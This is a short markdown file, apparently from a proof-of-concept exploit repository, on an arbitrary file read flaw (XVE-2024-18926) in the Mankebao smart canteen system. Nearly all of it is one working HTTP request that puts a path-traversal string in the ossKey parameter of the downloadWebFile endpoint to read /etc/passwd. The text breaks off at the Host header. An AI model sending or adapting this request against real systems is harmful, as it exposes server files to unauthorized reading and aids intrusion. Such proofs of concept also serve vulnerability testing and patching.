POC/wpoc/满客宝智慧食堂系统/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

249 B
Raw Blame History

满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)

poc

GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
Host